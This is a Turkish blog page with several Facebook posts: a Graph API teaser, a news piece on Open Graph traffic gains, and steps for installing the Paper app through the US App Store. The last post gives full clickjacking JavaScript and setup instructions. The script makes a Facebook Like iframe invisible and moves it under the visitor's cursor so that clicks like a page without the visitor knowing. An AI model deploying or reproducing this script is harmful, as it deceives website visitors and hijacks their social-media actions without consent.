Facebook Veri Sorgulama

Facebook username güncellemesinden sonra insanlar (daha çok yazılımcılar) ID değerlerini merak etmeye başladılar. Ben de sizin için Facebook’un ‘Facebook Graph Api’ nimetinin kullanımını sizlere biraz açıklamak istedim. PHP kullanarak hesap detaylarının JSON formatında yada XML dökümünü olarak çıkartabilirsiniz. Okumaya devam et “Facebook Veri Sorgulama”

Facebook Open Graph ile trafik akışı sağlıyor

facebook-opengraphFacebook’un web siteleri için önemli bir trafik kaynağı olduğu malum. Dünyaca ünlü sosyal ağ sitesi hem webde hem de mobilde web sitelerine direkt trafik akışı sağlamaya devam ediyor. Şimdilerde öne çıkan Open Graph ise sosyal medya-arama motoru rekabetinin yeni bir boyut kazandığını örnek hikayelerle belgeliyor.
Bir süre önce Facebook’un ‘Zaman Tüneli’ne ortaklarından olan izlesene.com yani Nokta, Facebook’un geliştirici bloguna konuk olmuştu. Facebook ekibine göre İzlesene gayet başarılı bir Open Graph kullanımı ile trafiğini ve aktif kullanıcı sayısını arttırmış.
Facebook’un geleneksel f8 konferasıyla birlikte Open Graph’ı kullanmaya başlayan popüler video sitesinin aylık aktif kullanıcı sayısı 250 binden 4 milyona ulaşmış, kullanıcı başına günlük video izleme sayısı ise 3 katına çıkmıştı.facebook-open-graphBenzer bir başarı hikayesi bu kez Digg’den geldi. Yeni CEO ile yoluna devam eden ve bu arada bir takım yenilikler yapıp, geri adım atan Digg, Open Graph ile mobil taraftaki trafik artışına dikkat çekiyor.diggopengraphKullanıcılarından Facebook hesaplarını Digg profilleriyle eşlemelerini ve eylemlerini paylaşmalarını isteyen sosyal imleme sitesi, mobil sayfası m.digg.com’un yüzde 29′luk bir trafik artışı yakaladığını ifade ediyor. Mobil profillerin yaklaşk yüzde 35′i Digg Social Reader üzerinden gelmiş. Facebook’tan Digg’e gelen kullanıcıların da yüzde 27′si zaten bir mobil cihaz üzerindeymiş.
Bu olumlu etki Digg’i sitenin mobildeki kullanıcı deneyimini geliştirmeye itmiş. Nokta ekibinin ise artık Blogcu dışındaki sitelerinde sadece Facebook ile Giriş eklentisini kullandığını Dijital12 konferansımızda Tümay Asena’dan öğrenmiştik.
Pinterest gibi yeni nesil sosyal ağlar, sosyal medya önemli bir trafik kaynağı olarak dikkat çekse de Facebook’un referansı geliştirmiş olduğu altyapı ile yarın için de önemli bir noktada. Arama motoru tarafında işlerin yolunda gitmediği Google’ın ise Google+ ile bu etkiyi nasıl yakalayacağı şimdilik belirsizliğini koruyor.
Kaynak: Webrazzi

Facebook’un Yeni Uygulaması Paper

Facebook’un kurucusu Mark Zuckerberg’in mobil cihazlar için düşündüğü ve bağımsız tek uygulamamız diye nitelendirdiği haber uygulaması PAPER açıldı. Ancak sadece AppStore USA mağazasına kayıtlı kullanıcılar için aktif olan PAPER’i ülkemizde kullanmak için aşağıdaki adımları izleyebilirsiniz.facebook-paper-appFacebook şirketin’nin yaklaşık 54 MB boyutundaki Paper uygulamasında, öncelikle sizi karşılayan sesli menü, uygulamayı hakkında bilgi veriyor. Paper’da, kendi Facebook hesabınızdan bazı şeyleri görebiliyorsunuz. Geriye kalan başlıklarda ise tamamen kişisel tercihlerinizle alakalı olarak seçebiliyorsunuz. Burada 9 adet farklı title seçebilmemiz mümkündür.ABD dışındaki kullanıcılar, Paper’ı yüklemek için ne yapmalılar?

  • iPhone ya da iPad’inizden AppStore’u açın ve ekranın en altına gelin
  • Burada “Apple ID: MAİL ADRESİNİZ” yazan kısma dokunun
  • “View Apple ID” yi seçtikten sonra, şifreninizi girin
  • “Change country or region” butonuna tıklayarak, en üstteki United States seçeneğini işaretleyin. Burada herhangi bir eyaleti seçebilirsiniz.
  • Ödeme bilginiz sorulduğunda “None” seçeneğini işaretleyerek işlemi sonlandırabilirsiniz. Bu andan itibaren US
  • App Store’un bir üyesisiniz.
  • Şimdi AppStore üzerinden bu linke tıklayarak veya “Paper” olarak arama yaparak uygulamayı bulup, indirebilirsiniz.

[display_alert style=info]UYARI: Yukarıdaki işlemi yapan kullanıcılar Türkiye AppStore’dan ABD AppStore’a geçiş yapmış olacak ve daha önce Apple’daki kayıtlı ödeme bilgileri silinecektir. Bununla birlikte, eğer hesabınızda harcamadığınız bir bakiye varsa ülke değiştirmeniz mümkün olmayacaktır.[/display_alert]
 

Facebook Otomatik Sayfa Beğendirme 2014

facebook-otomatik-sayfa-begendirmeClickjack kim tarafından hazırlandığını bilmediğim bir script (bir dizi javascipt kodu).
Alttaki linkten öncelikle clickjack.js dosyasını indiriyoruz. Notepad veya benzeri bir program ile açıyoruz. Büyük harflerle “SAYFANIZIN LİNKİ” yazan yere sayfanızın linkini ekliyoruz. Önemli: Başında ve sonundaki tek tırnakları silmeyin.(function(){ var tempX = 0, tempY = 0, IE = document.all ? true : false; if (!IE) document.captureEvents(Event.MOUSEMOVE); var like = document.createElement(‘iframe’); like.src = ‘http://www.facebook.com/plugins/like.php?href=’ + encodeURIComponent(/*document.location.href*/ ‘Sayfanızın Linki’) + ‘&layout=standard&show_faces=true&width= 53&action=like&colorscheme= light&height=80’; like.scrolling = ‘no’; like.frameBorder = 0; like.allowTransparency = ‘true’; like.style.border = 0; like.style.overflow = ‘hidden’; like.style.cursor = ‘pointer’; like.style.width = ’53px’; like.style.height = ’23px’; like.style.position = ‘absolute’; like.style.opacity = 0; //Would be 0 if really used document.getElementsByTagName(‘body’)[0].appendChild(like); window.addEventListener(‘mousemove’, mouseMove, false); setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); window.removeEventListener(‘mousemove’, mouseMove, false); }, 6000); function mouseMove(e) { if (IE) { tempX = event.clientX + document.body.scrollLeft; tempY = event.clientY + document.body.scrollTop; } else { tempX = e.pageX; tempY = e.pageY; } if (tempX < 0) tempX = 0; if (tempY < 0) tempY = 0; like.style.top = (tempY – 8) + ‘px’; like.style.left = (tempX – 25) + ‘px’; return true } })();Dosyayı ftp’den anadizine atıyoruz. Daha sonra alttaki kodu düzenleyerek temamızın header.php bölümüne ekliyoruz.
<script src=”http://siteadı.com/clickjack.js“></script>
Wordpress kullanmayanlar <script> etiketi gördüğünüzde hemen öncesine ekleyin problem olmayacaktır.
Elimden geldiğince basit anlatmaya çalıştım. Bilenler zaten dosyayı istediği yere gönderebilir(anadizin dışında). Problem yaşarsanız yardımcı olmaya çalışırım. Lütfen ziyaretçileri sıkmayacak şekilde bu scripti kullanın. Clickjack.js dosyasındaki 6000 değerini azaltarak veya artırarak scriptin aktiflik süresini değiştirebilirsiniz.